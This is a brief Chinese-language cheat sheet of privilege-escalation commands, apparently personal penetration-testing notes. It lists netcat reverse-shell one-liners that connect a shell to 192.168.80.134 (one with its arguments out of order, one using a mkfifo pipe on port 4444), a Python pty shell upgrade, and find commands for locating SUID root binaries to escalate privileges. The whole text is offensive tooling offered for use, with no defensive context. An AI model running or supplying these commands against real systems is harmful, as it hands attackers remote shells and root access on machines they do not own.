提权命令

Nc反弹shell

nc -e 192.168.80.134 /bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.80.134 4444>/tmp/f

Python交互式shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Linux suid提权

查找具有root权限的命令

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb